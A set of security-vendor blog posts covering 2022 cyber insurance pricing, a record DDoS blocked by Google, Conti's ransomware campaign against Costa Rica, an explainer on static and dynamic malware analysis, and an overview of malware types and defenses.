Cyber Insurance Rates Reach New Heights

Cyber insurance is one of the fastest-growing markets and is projected to reach $20 billion by 2025 (Source).

Insurance rates are increasing dramatically as well, with one report showing a 24.5% increase in Q1 of 2022 on top of a 74% increase in Q4 of 2021.

The drastic increase in premiums is due to many factors, but the most glaring is the increase in ransomware attacks and the claims made to pay out ransoms, driving up loss ratios for insurance companies.

Cyber insurance underwriters are now more cautious when assessing risk for insureds and will continue to thoroughly review internal security controls and cyber risk procedures.

One positive outcome for the security industry is that insurance providers are requiring that companies either have an in-house MDR solution in place or an outsourced partner to help defend their networks and devices. Without these measures, insurance companies are denying requests for new policies until these steps are taken.

Google Blocks DDoS Attack in June

On June 1st, a Google Cloud Armor customer endured a DDoS attack over HTTPS that peaked at 46 million requests per second (RPS).

This is considered the largest amount of blocked RPS to date, 80% more than the previous record of 26 million RPS. The attack lasted 69 minutes, and operations ran according to plan because the customer had already deployed the recommended rule.

Even though the DDoS attack lasted over an hour, the speed at which the request rate ramped up is impressive. Starting at just 10,000 RPS on the victim’s load balancer, eight minutes later Google Cloud Armor Protection began sending alerts and signals when the load jumped to 100,000 RPS. Two minutes later the attack peaked at 46 million RPS and then slowly dwindled over the next hour.

Google employees stated that the attackers were not getting the desired outcome and were spending more to execute the attack than they were gaining. The malware has not been identified yet, but there are signs that point to the Mēris botnet, which was responsible for other DDoS attacks with close to record RPS.

Google Becomes a Security Player with Mandiant

Although Google Cloud Platform (GCP) was considered to be one of the big three cloud providers, it was in a distant third place after AWS and Microsoft Azure.

Now with the $5.4 billion acquisition of Mandiant, Google looks to become an even bigger player in the security space. GCP looks to combine its already existing security portfolio with Mandiant’s cyber threat intelligence to give it a new more bolstered position for cloud offerings.

Conti Cybercrime Group

The cybercrime group, Conti, attacked Costa Rican healthcare organizations and national businesses with ransomware.

Early in the year, on April 15th, the Conti group of cybercriminals deployed its first attack on Costa Rica. The initial attack was on the Ministry of Finance, where the group gained access over a VPN connection using credentials stolen by previously installed malware.

From there, a Conti operator gained access to every host on Costa Rica’s interconnected networks, uploaded 672GB of data, and executed ransomware.

The ransom amount was $10 million and came with the threat of attacking the rest of Costa Rica’s ministries if it wasn’t paid.

Costa Rica refused to pay, and Conti kept its promise and continued the attacks on the following agencies:

  • The Administrative Board of the Electrical Service of the province of Cartago (Jasec)
  • The Ministry of Science, Innovation, Technology and Telecommunications
  • The Ministry of Labor and Social Security (MTSS)
  • The National Meteorological Institute (IMN)
  • Radiográfica Costarricense (Racsa)
  • The Interuniversity Headquarters of Alajuela
  • The Social Development and Family Allowances Fund (FODESAF)
  • Costa Rican Social Security Fund (CCSS)

The attacks led to disruptions costing millions of dollars for Costa Rican businesses, healthcare systems, and government agencies.

On May 8th, the Costa Rican President declared a national emergency, but 11 days later Conti’s leaders started to disband. The Conti negotiation and news website went down, and chatrooms, servers and proxies began to go offline.

By late June, the data leak site was removed and Conti’s operations were declared dead. The cybercriminal group Conti has since rebranded under several different names but has left its mark, proving that a cyber gang can execute country-wide extortion.

Other Notable Statistics

  • Ransomware breaches (outside of healthcare) cost businesses an average of $4.62 million. (Varonis)
  • Approximately sixty percent of data breaches are caused by stolen credentials. (Comparitech)
  • A breach lifecycle goes undetected for 200 days and takes 77 days to become contained on average
  • Nearly half (43%) of all cyber-attacks are specifically targeted at small businesses. (Dataprot)
  • Mega breaches (involving 50 million to 65 million records) cost an average of $401 million. This figure is significantly higher than previous estimates and highlights just how costly these types of incidents can be. (Varonis)

Dynamic and Static Malware Analysis https://www.cybermaxx.com/resources/dynamic-and-static-malware-analysis/ Tue, 14 Jun 2022 11:00:37 +0000
It’s that time: malware has entered the network and the analyst needs to inspect this infiltration…or maybe it hasn’t entered, and due diligence needs to be done in order to properly identify whether the threat is real.

Cybersecurity analysts have as many tools at their disposal to do their jobs as there are malware, viruses, and other nasties out there.

We’re going to dive into two forms of analysis for inspecting malware in order to determine whether the threat is real or not.

To Be Dynamic, or Not to Be Dynamic…Static

Malware analysis can be separated into two groups: static and dynamic.

  • Static malware analysis: examines a malware file without actually running the program. It’s a safer way to analyze malware, as running the code could infect the system. In its most basic form, static analysis gleans information from malware without the need to execute or launch.
  • Dynamic malware analysis: is when a malware sample is executed in a test environment to observe its behavior. This can be done with readily available tools such as VMware, OllyDbg, and more.

What is Static Malware Analysis?

Static malware analysis refers to performing code-based analysis on malware binaries without executing them in a sandbox environment or on real machines.

Static analysis is normally the first step of analysis and can tell an analyst how the malware is designed and maybe what it actually does. Hashing a sample and conducting searches in VirusTotal (VT) would be static analysis. It lets the analyst know what might be needed to conduct dynamic analysis.

It’s also helpful in studying unknown malware or malware whose behavior does not depend on other factors (e.g., user input).

What is Dynamic Malware Analysis?

Dynamic malware analysis can be considered as the process of interacting and activating malicious functionality, often following a specific logic or commands written by the malware’s author.

Dynamic analysis is running the malware in a sandbox while monitoring actions and changes. The analyst will typically run multiple tools to capture network traffic, changes in the registry, or monitor running processes to determine what the intent of the malware is.

Public sandboxes execute the malware and record the actions (dynamic analysis). Unless the malware is programmed to not function under certain conditions, an analyst will typically get to see what it does.

The more complex malware samples will be aware of the environment they are running in and will not execute if they believe they are under analysis. This is where reverse engineering comes into play.

Another advantage is that it enables the analyst to uncover novel characteristics of the malicious code without generating too many false positives. This is particularly important when dealing with more complex pieces of malware that do not have enough information in VT or other public sandboxes out there.

It’s Go Time

Those two forms of analysis are but two of the tools or procedures analysts use to properly identify potential threats.

To recap: static analysis examines a malware file without actually running the program, and dynamic analysis is when a malware sample is executed in a test environment to observe its behavior. Oversimplified, but a quick go-to if something short and simple is needed.

Neither is better, just different. They are two sides of a coin that make up a whole, and they work best when used together, where appropriate.

Malware analysis can be a dangerous and complex process to undertake, requiring a great deal of specialized knowledge and skill in order to be successfully carried out.

With tools like these, the good guys win (a lot of the time)…against the bad guys.

Variety is the Spice to Life: The Different Types of Malware https://www.cybermaxx.com/resources/variety-is-the-spice-to-life-the-different-types-of-malware/ Mon, 18 Apr 2022 05:55:55 +0000
What is Malware?

Malware, also known as “malicious software,” typically refers to a malicious file or segment of code delivered to compromise, exploit, or damage a victim system or network.

Malware comes in a variety of types – each designed and created with specific characteristics of how to infiltrate and interact within a target network:

  • Ransomware
  • Fileless Malware
  • Spyware
  • Adware
  • Trojans
  • Worms
  • Rootkits
  • Keyloggers
  • Mobile Malware
  • Viruses
  • Bots or botnets
  • Malvertising

Threat actors may deploy malware to accomplish one or many of the steps within the “Cyber Kill Chain”:

  • Recon
  • Weaponization
  • Delivery
  • Exploitation
  • Installation
  • Command & Control

How is Malware Deployed?

Unfortunately, even the most prepared may fall victim to malware. Cybercriminals, often referred to as cyber threat actors or hackers, have become extremely proficient in developing strategies to entice unsuspecting individuals to access, download, or execute malware.

Common malware delivery methods may include:

  • Phishing or Spear-Phishing
  • Visiting an infected website or clicking a weaponized link (drive-by download attack)
  • Introducing and using unauthorized software or applications (Shadow IT)
  • Using or having unpatched, out-of-date, or unsupported systems or applications (Vulnerabilities)

What are the Repercussions?

Left unchecked, these types of malware can cause immense damage to a business’s networks, products and services. Some of the damage has resulted in:

  • Costs to restore and rebuild systems, applications, and data
  • Lost revenue from disruption of services (e.g., outages, degradation, etc.)
  • Lost revenue from reputational impact associated with a confirmed breach (e.g., drop in stock prices, customers’ loss of confidence, etc.)
  • Fees or fines derived from settlements and compensation
  • Costs associated with cyber insurance providers, leveraging external counsel, and rebranding / marketing post breach

How Can I Protect Myself From Malware?

Due to the various malware types and delivery methods, it is important to have a comprehensive security system in place to keep your systems, network and data protected.

Some of the security controls that you can take to protect from malware include:

Technical Controls

Processes and Services

It’s important to understand that every organization is unique, leveraging a variety of technology, hosting various services, and storing vast amounts of data. While there’s no guarantee that any one tool, service or control can detect or protect an organization from all malware, integrating a full complement of security controls, or a defense-in-depth strategy, can assist in lessening an organization’s susceptibility to attacks.
